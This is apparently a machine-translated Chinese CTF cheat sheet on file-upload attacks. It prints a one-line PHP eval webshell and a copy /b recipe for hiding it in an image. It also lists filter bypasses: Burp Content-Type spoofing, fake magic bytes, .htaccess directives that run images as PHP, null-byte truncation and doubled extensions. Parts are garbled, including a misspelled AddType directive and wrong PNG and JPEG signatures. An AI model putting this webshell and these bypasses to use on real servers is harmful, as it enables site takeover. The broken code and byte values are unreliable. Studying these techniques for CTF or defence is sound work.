当前位置:网站首页>CTF skill tree - file upload
CTF skill tree - file upload
2022-07-28 10:54:00 【jjj34】
Front tools : Chinese ant sword
1. In a normal sentence, Trojan horse
<?php
eval($_POST["pass"]);
2. Picture horse
adopt copy To synthesize
copy name1.png/b+name2.php/a name3.php
name1 For the name of the picture
/b Represents a binary
name2 In one sentence, Trojan files
/a Express ASCII Code file
name3 Is the name of the synthesized picture
Upload through burp_suite Modify the Content-Type : image/png
3. Ban JavaScript
In settings , Search for JavaScript Disable after
4.MIME Bypass
adopt burp_suite Modify the type of file
5. Header detection
adopt burp_suite Modify the identifier of the file header , Let the firewall mistake it for a picture
89 50 4E 47 It is the identification code of the picture
6. add to GIF89a Bypass
The principle is to make the firewall mistakenly think this is a picture
GIF GIF 89A
JPEG(JPG) FFD*FF
PNG 89504E87
Tips : Find the location of the addition : stay <?php Put four in front + Number , And then take Hex Revision in China
7. adopt .htaccess Bypass
structure .htaccess file
1. Match the file name as php perform
<FilesMatch "asdf">
SetHandler application/x-httpd-php
</FilesMatch>2. take png As php perform ( It's not easy to use )
AddType aoolication/x-httpd-php .png8.00 truncation
Two conditions under which truncation occurs :
php< 5.3.4
magic_quotes_gnc = off
Title Description : After uploading, the title does not return the file name
Explain that this problem involves renaming , therefore , Add truncation characters , Break rename
solution :
1. Upload picture horse
2. stay url Column truncation , Do not let the system rename
3. visit :
Ant sword connection :
http://challenge-98be3014d8744500.sandbox.ctfhub.com:10800/upload/1.php9. Double writing bypasses
Write the suffix twice , Let it delete
Such as .pphphphpp Take it apart :p(php)h(php)p
10. Modify file name resolution
Look at the picture , The source code prompt will send the file as python To resolve and accept only the suffix .jpg and .png The file of , So we call python Medium os library , To execute remote code execution commands
Change the suffix of the file to 11.png
Successfully get flag
边栏推荐
猜你喜欢
Aike AI frontier promotion (7.28)
Particle swarm optimization to solve the technical problems of TSP
GKNoiseMap
11_ue4进阶_男性角色换成女性角色,并修改动画
GKSpheresNoiseSource
Blue Bridge Cup embedded Hal library USART_ TX
11_ UE4 advanced_ Change male characters to female characters and modify the animation
3. MapReduce explanation and source code analysis
Inventory: exciting data visualization chart
The future of generating confrontation networks in deepfake
随机推荐
Judge whether the nixie tube is a common anode or a common cathode
蓝桥杯嵌入式-HAL库-LCD
Andorid development III (intent)
GKRidgedNoiseSource
Network file system service (NFS)
Using k-means clustering to classify tariff models of different industries
Learn how to do e-commerce data analysis (with operation analysis index framework)
Reading these six books makes learning MySQL easier
ctf技能树----文件上传
GKPerlinNoiseSource
BOM部分属性及理解
GKNoiseMap
Tensorflow 知识点
Ten questions about low code: tell everything about low code!
The blogs of excellent programmers at home and abroad are all here, please check it
RoboCup (2D) experiment 50 questions and the meaning of main functions
Two years of crud, two graduates, two months of preparation for the interview with ALI, and fortunately won the offer grading p6
c语言进阶篇:指针(一)
1. Sum of two numbers
Solving the optimal solution of particle swarm optimization